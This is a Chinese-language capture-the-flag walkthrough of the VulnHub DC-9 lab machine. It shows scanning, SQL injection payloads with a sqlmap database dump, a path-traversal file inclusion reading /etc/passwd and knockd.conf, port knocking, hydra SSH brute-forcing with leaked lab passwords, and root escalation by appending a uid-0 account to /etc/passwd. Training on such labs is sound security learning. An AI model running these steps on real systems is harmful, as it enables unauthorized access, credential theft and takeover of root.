前言
这次练习的靶机是vulnhub平台下的DC系列靶机第9台,也是最后一台。下载地址为https://www.vulnhub.com/entry/dc-9,412/。挑战该靶机的最终目的是获取root权限,然后读取唯一的flag。这台靶机的难度为中等,其关键点是需要知道knockd服务。建议在挑战该靶机之前了解一下knockd服务。
虚拟机配置
这次采用的网络连接模式依然是NAT模式,为了避免扫描到其他物理主机。在导入虚拟机后,右击DC-9靶机,然后选中配置。依次点击网络配置
->NAT模式
->高级
->生成
,然后确认即可。
收集信息
nmap -sn --min-parallelism 100 --min-hostgroup 100 192.168.119.0/24
-sn 代表存活主机扫描,不进行端口测探。
–min-parallelism 代表调整探测报文的并行度,也就是在扫描同一台主机时会发送很多个探测数据包,这个参数指定的数即nmap一次至少要发多少个数据包。
–min-hostgroup 代表调整并行扫描组的大小,也就是一次性同时对多少台主机进行扫描。
更详细内容可以参考:https://zhuanlan.zhihu.com/p/322244582,关于nmap的一些性能参数的学习。
┌──(root?kali)-[~]
└─# nmap -sn --min-parallelism 100 --min-hostgroup 100 192.168.119.0/24
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-04 20:54 EDT
Stats: 0:00:09 elapsed; 0 hosts completed (0 up), 255 undergoing ARP Ping Scan
Parallel DNS resolution of 3 hosts. Timing: About 66.67% done; ETC: 20:54 (0:00:04 remaining)
Nmap scan report for 192.168.119.2
Host is up (0.00013s latency).
MAC Address: 00:50:56:E6:BD:97 (VMware)
Nmap scan report for 192.168.119.172
Host is up (0.00044s latency).
MAC Address: 00:0C:29:BD:2D:31 (VMware)
Nmap scan report for 192.168.119.254
Host is up (0.00018s latency).
MAC Address: 00:50:56:E8:75:E7 (VMware)
Nmap scan report for 192.168.119.130
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 12.64 seconds
发现靶机的IP地址为 192.168.119.172
,然后用nmap对靶机进行详细地扫描。
nmap -A -sV -p- --min-parallelism 100 192.168.119.172
-A 代表综合性扫描,能收集很多重要的信息
-sV 代表扫描主要的服务信息
-p- 参数p是指定端口,后面的
-
代表所有端口。
┌──(root?kali)-[~]
└─# nmap -A -sV -p- --min-parallelism 100 192.168.119.172
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-04 20:55 EDT
Nmap scan report for 192.168.119.172
Host is up (0.00068s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:BD:2D:31 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hopTRACEROUTE
HOP RTT ADDRESS
1 0.68 ms 192.168.119.172OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.07 seconds
发现开放了 80
端口,其中22端口被过滤,这里就猜测可能是靶机应用了knockd服务把22端口关闭,需要访问特定的端口序列后才会开放22端口。关于ssh保护的详细内容可以参考:https://www.cnblogs.com/rongfengliang/p/10904061.html,保护ssh的三把锁。
SQL注入漏洞
先到web上看看以寻找突破口,用浏览器打开该该网站。
点击导航栏上的Manage
后发现了一个登陆页面,尝试一下暴力破解,没有成功。
点击导航栏上的Search
后发现了一个输入框,首先简单判断一下这里是否存在sql注入,尝试输入1' or 1=1#
,发现搜索出了很多结果。
然后再次输入1' or 1=2#
,发现没有搜索到任何结果,说明此处存在sql注入。
该SQL注入点为post提交方式,所以我们可以先用burpsuite抓取在search页面提交的数据,然后右击鼠标,然后点击 Copy to file
,保存为一个文件。
然后用sqlmap读取该文件对目标网站进行攻击。
sqlmap -l target --dump --batch
-l 代表从burpsuite保存的文件中读取攻击目标,也可以用-r参数代替。
target 是刚刚用burpsuite保存的文件的名称。
–dump 代表读取数据库中所有内容
–batch 表示自动化运行,不会给出选项供用户选择。
┌──(root?kali)-[~/Documents/DC-9]
└─# sqlmap -l target --dump --batch
do you want to crack them via a dictionary-based attack? [y/N/q] N
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+[21:35:48] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.119.172/dump/Staff/Users.csv'
[21:35:48] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[21:35:48] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email | phone | lastname | reg_date | firstname | position |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO |
| 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources |
| 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator |
| 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk |
| 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver |
| 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores |
| 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts |
| 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts |
| 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales |
| 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor |
| 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant |
| 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor |
| 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing |
| 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor |
| 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat |
| 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor |
| 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+[21:35:48] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.119.172/dump/Staff/StaffDetails.csv'
[21:35:48] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09042021_0935pm.csv'
要注意的是此处只查询出了数据库Staff中的内容。该网站还有一个名为users的数据库,该库中保存着一些账号和密码,可以在后面用来进行ssh的爆破。
现在已经获取了admin的md5加密的密文856f5de590ef37314e7c3bdf6f8a66dc
,尝试在https://www.somd5.com/
破解该密码。
现在已经获取了admin的密码transorbital1
,登陆网站后台进行进一步渗透。
文件包含漏洞
登陆网站后台后发现底部有一行文字 File does not exist
,估计这个页面是可以用过参数控制文件包含内容。
控制文件包含的参数可以尝试常用的file
,include
,require
等常见参数,包含内容可以使用/etc/passwd
来尝试,但是没有包含成功。最后改用burpsuite+字典进行爆破。
文件内容的字典可以使用 kali自带的字典/usr/share/wordlists/wfuzz/vulns/dirTraversal-nix.txt
。字典跑完后点击Length
进行排序,文件长度最长的请求应该就是文件包含成功了。
然后在浏览器中访问该地址,发现包含文件成功。
http://192.168.119.172/manage.php?file=../../../..//etc/passwd
knockd服务
猜测该靶机使用了knockd服务,首先来简单介绍一下knockd服务:当你的一个端口不想对外开放时可以通过knockd将它关闭,这样别人就无法直接访问这个端口。如果自己想访问这个端口,那么必须先按顺序访问指定的端口,并且这几步操作必须在一定时间内完成。当你在一定之间内按顺序访问了指定端口后,被关闭的端口就会对你开放一段时间。更详细的内容可以参考:https://www.cnblogs.com/rongfengliang/p/10904061.html,保护ssh的三把锁。
如果开启了knockd服务,那么会存在一个配置文件/etc/knockd.conf
,该配置文件中保存着需要访问的端口顺序。我们可以通过文件包含漏洞查看该配置文件。
http://192.168.119.172/manage.php?file=../../../..//etc/knockd.conf
根据配置文件的显示,我们需要依次访问7469
、8475
、9842
端口才能访问ssh服务。现在需要在本地安装 knockd
程序,我们可以通过knockd程序对靶机的指定端口按顺序访问。
apt install knockd
knock 192.168.119.172 7469 8475 9842
现在可以访问靶机的22端口了,所以现在尝试对靶机的ssh密码进行爆破。
爆破ssh密码
在爆破之前需要准备好字典,在数据库的users库中存在着一些账号和密码,用sqlmap把这些信息查询出来,做成字典。
sqlmap -l target -D users --dump --batch
-D 指定需要查询的库
┌──(root?kali)-[~/Documents/DC-9]
└─# sqlmap -l target -D users --dump --batch
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+[22:27:26] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.119.172/dump/users/UserDetails.csv'
[22:27:26] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/root/.local/share/sqlmap/output/results-09042021_1027pm.csv'
将所有账号保存在user.txt
中,将所有密码保存在文件pass.txt
中。然后使用hydra对ssh进行爆破。
hydra -L user.txt -P pass.txt ssh://192.168.119.172
-L 指定账号文件字典,如果需要指定单个账号则使用小写的-l
-P 指定密码文件字典,如果需要指定单个密码则使用小写的-p
┌──(root?kali)-[~/Documents/DC-9]
└─# hydra -L user.txt -P pass.txt ssh://192.168.119.172
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-04 22:43:24
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 361 login tries (l:19/p:19), ~23 tries per task
[DATA] attacking ssh://192.168.119.172:22/
[22][ssh] host: 192.168.119.172 login: chandlerb password: UrAG0D!
[22][ssh] host: 192.168.119.172 login: joeyt password: Passw0rd
[22][ssh] host: 192.168.119.172 login: janitor password: Ilovepeepee
[STATUS] 363.00 tries/min, 363 tries in 00:01h, 1 to do in 00:01h, 14 active
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-04 22:44:26
成功获取了三个账号的密码:login: chandlerb password: UrAG0D!
,login: joeyt password: Passw0rd
,login: janitor password: Ilovepeepee
。
提权
经过测试前两个账号没有发现什么特殊文件,也无法提权。登陆janitor账号后,在文件~/.secrets-for-putin
中发现了一个密码文件passwords-found-on-post-it-notes.txt
。
ssh janitor@192.168.119.172
cd .secrets-for-putin
cat passwords-found-on-post-it-notes.txt
┌──(root?kali)-[~/Documents/DC-9]
└─# ssh janitor@192.168.119.172
janitor@192.168.119.172's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Sep 5 12:48:56 2021 from 192.168.119.130
janitor@dc-9:~$ ls -la
total 16
drwx------ 4 janitor janitor 4096 Sep 5 12:44 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Sep 5 12:44 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .secrets-for-putinjanitor@dc-9:~$ cd .secrets-for-putin
janitor@dc-9:~/.secrets-for-putin$ ls
passwords-found-on-post-it-notes.txt
janitor@dc-9:~/.secrets-for-putin$ cat passwords-found-on-post-it-notes.txt
BamBam01
Passw0rd
smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
查看这个文件中的密码,把这些密码保存在一个文件 pass2.txt
中,并再次使用hydra进行ssh的爆破。
hydra -L user.txt -P pass2.txt ssh://192.168.119.172
└─# hydra -L user.txt -P pass2.txt ssh://192.168.119.172
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-09-04 22:56:26
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 114 login tries (l:19/p:6), ~8 tries per task
[DATA] attacking ssh://192.168.119.172:22/
[22][ssh] host: 192.168.119.172 login: fredf password: B4-Tru3-001
[22][ssh] host: 192.168.119.172 login: joeyt password: Passw0rd
1 of 1 target successfully completed, 2 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-09-04 22:56:48
爆破出了一个新的账号密码 login: fredf password: B4-Tru3-001
,登陆这个账号尝试一下提权操作。
ssh fredf@192.168.119.172
sudo -l
┌──(root?kali)-[~/Documents/DC-9]
└─# ssh fredf@192.168.119.172
fredf@192.168.119.172's password:
Linux dc-9 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u2 (2019-11-11) x86_64The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser fredf may run the following commands on dc-9:(root) NOPASSWD: /opt/devstuff/dist/test/test
fredf@dc-9:~$
发现fredf可以使用超级权限执行test,尝试着执行一下test。
/opt/devstuff/dist/test/test
执行后出现了以下内容:
fredf@dc-9:~$ /opt/devstuff/dist/test/test
Usage: python test.py read append
看这个内容猜测它的功能是追加内容到一个文件中去,最后在 /opt/devstuff
中发现了一个文件 test.py
,这个Python便是test的源码,查看这个源码分析test的功能与使用方法。
fredf@dc-9:/opt/devstuff/dist$ cd /opt/devstuff/
fredf@dc-9:/opt/devstuff$ ls
build dist __pycache__ test.py test.spec
fredf@dc-9:/opt/devstuff$ cat test.py
#!/usr/bin/pythonimport sysif len (sys.argv) != 3 :print ("Usage: python test.py read append")sys.exit (1)else :f = open(sys.argv[1], "r")output = (f.read())f = open(sys.argv[2], "a")f.write(output)f.close()
fredf@dc-9:/opt/devstuff$
查看源码发现这个程序的功能是将参数1文件内容追加到参数2文件中。所以我们可以将一个账号信息追加到 /etc/passwd
中。
/etc/passwd 保存着所有账号的信息,可以通过在该文件中添加一个具有root权限的账号信息来获取root权限。
首先我们来了解一下/etc/passwd
内容的格式,以root为例:
root:x:0:0:root:/root:/bin/bash
字段1: 用户名。
字段2:密码占位符,x代表有密码,也可以直接填入密码的密文。
字段3:用户的uid,如果一个用户uid为0则表示该用户超级管理员。
字段4:用户的gid,也就是所属用户组的id。
字段5:用户信息(弃用)。
字段6:用户家目录。
字段7:用户登陆系统后使用的shell。
然后通过openssl生成密码密文。
openssl passwd -1 -salt rpsate rpsate
passwd 代表生成密码的密文。
-1 代表使用MD5的加密方法。
-salt 代表密码加盐。
第一个rpsate是账号,第二个rpsate是密码。
更详细的内容可以参考https://blog.csdn.net/jiajiren11/article/details/80376371,/etc/shadow中密码段的生成方式
┌──(root?kali)-[~/Documents/DC-9]
└─# openssl passwd -1 -salt rpsate rpsate
$1$rpsate$2r3jb6WfuHP8DFRd31cUF1
所以我们将 rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash
追加到 /etc/passwd
即可。现将这一字符串写入一个文件中,然后再通过test程序来追加到/etc/passwd
。
经过测试字段6用户家目录必须加上,否则无法识别到账号。
字段2密码一栏不能为空,否则不能认证成功,上面字段2是密码rpsate加密后的密文。
echo 'rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash' > /tmp/a
sudo /opt/devstuff/dist/test/test /tmp/a /etc/passwd
fredf@dc-9:/opt/devstuff$ echo 'rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash' > /tmp/a
fredf@dc-9:/opt/devstuff$ sudo /opt/devstuff/dist/test/test /tmp/a /etc/passwd
fredf@dc-9:/opt/devstuff$ tail /etc/passwd
chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash
joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash
rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash
rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash
monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash
phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash
scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash
janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash
janitor2:x:1017:1017:Scott Morrison:/home/janitor2:/bin/bash
rpsate:$1$rpsate$2r3jb6WfuHP8DFRd31cUF1:0:0::/root:/bin/bash
发现现在已经将rpsate账号信息写入了/etc/passwd
,现在可以跳转到具有root权限的账号rpsate了。
su rpsate
cat /root/theflag.txt
fredf@dc-9:/opt/devstuff$ su rpsate
Password:
root@dc-9:/opt/devstuff# id
uid=0(root) gid=0(root) groups=0(root)
root@dc-9:/opt/devstuff# cd /root
root@dc-9:~# ls
theflag.txt
root@dc-9:~# cat theflag.txt ███╗ ██╗██╗ ██████╗███████╗ ██╗ ██╗ ██████╗ ██████╗ ██╗ ██╗██╗██╗██╗
████╗ ██║██║██╔════╝██╔════╝ ██║ ██║██╔═══██╗██╔══██╗██║ ██╔╝██║██║██║
██╔██╗ ██║██║██║ █████╗ ██║ █╗ ██║██║ ██║██████╔╝█████╔╝ ██║██║██║
██║╚██╗██║██║██║ ██╔══╝ ██║███╗██║██║ ██║██╔══██╗██╔═██╗ ╚═╝╚═╝╚═╝
██║ ╚████║██║╚██████╗███████╗ ╚███╔███╔╝╚██████╔╝██║ ██║██║ ██╗██╗██╗██╗
╚═╝ ╚═══╝╚═╝ ╚═════╝╚══════╝ ╚══╝╚══╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝╚═╝Congratulations - you have done well to get to this point.Hope you enjoyed DC-9. Just wanted to send out a big thanks to all those
who have taken the time to complete the various DC challenges.I also want to send out a big thank you to the various members of @m0tl3ycr3w .They are an inspirational bunch of fellows.Sure, they might smell a bit, but...just kidding. :-)Sadly, all things must come to an end, and this will be the last ever
challenge in the DC series.So long, and thanks for all the fish.
提权成功!
参考文献
[1] https://zhuanlan.zhihu.com/p/322244582,关于nmap的一些性能参数的学习。
[2] https://zhuanlan.zhihu.com/p/112172905,vulnHub-DC9
[3] https://www.cnblogs.com/rongfengliang/p/10904061.html,保护 SSH 的三把锁
[4] https://blog.csdn.net/jiajiren11/article/details/80376371,/etc/shadow中密码段的生成方式